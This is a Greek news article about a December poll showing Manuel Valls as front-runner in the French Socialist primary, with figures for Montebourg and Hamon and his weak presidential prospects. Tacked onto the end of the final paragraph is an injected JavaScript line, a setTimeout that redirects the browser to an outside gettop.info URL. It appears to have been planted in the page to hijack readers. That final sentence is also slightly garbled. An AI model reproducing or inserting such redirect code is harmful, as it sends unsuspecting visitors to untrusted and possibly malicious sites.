Ο Βαλς το αδιαφιλονίκητο φαβορί των Σοσιαλιστών

0
7

 

Δημοσκόπηση που δημοσιεύτηκε σήμερα αναδεικνύει τον Μανουέλ Βαλς, που παραιτήθηκε από την πρωθυπουργία για να προετοιμαστεί για την προεκλογική εκστρατεία του ενόψει των προεδρικών, το αδιαφιλονίκητο φαβορί για το χρίσμα του Σοσιαλιστικού Κόμματος.

Ο Βαλς εμφανίζεται στην πρώτη θέση με 43% κατά τον πρώτο γύρο των προκριματικών στις 22 Ιανουαρίου μπροστά από τον πρώην υπουργό Οικονομίας Αρνό Μοντεμπούρ, που έρχεται δεύτερος με 25%. Στην τρίτη θέση εμφανίζεται ο Μπενουά Χαμόν με 22%, σύμφωνα με τη δημοσκόπηση της εταιρείας Harris Interactive για λογαριασμό του France Televisions.

Ο Βαλς φέρεται να κερδίζει το χρίσμα επικρατώντας όποιου από τους δύο συνυποψηφίους του πάει στον δεύτερο γύρο στις 29 Ιανουαρίου, με ποσοστό από 55%-57%, σύμφωνα με όλες τις δημοσκοπήσεις του Δεκεμβρίου.

Ωστόσο, όσον αφορά στις προεδρικές εκλογές, ο Βαλς δεν έχει πολλές ελπίδες να περάσει στον δεύτερο γύρο των προεδρικών εκλογών όπου κατατάσσεται πέμπτος, ενώ στον δεύτερο γύρο των προεδρικών εκλογών, στις 7 Μαϊου, αναμένεται να επικρατήσει ο συντηρητικός Φρανσουά Φιγιόν της Ακροδεξιάς Μαρίν Λεπέν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here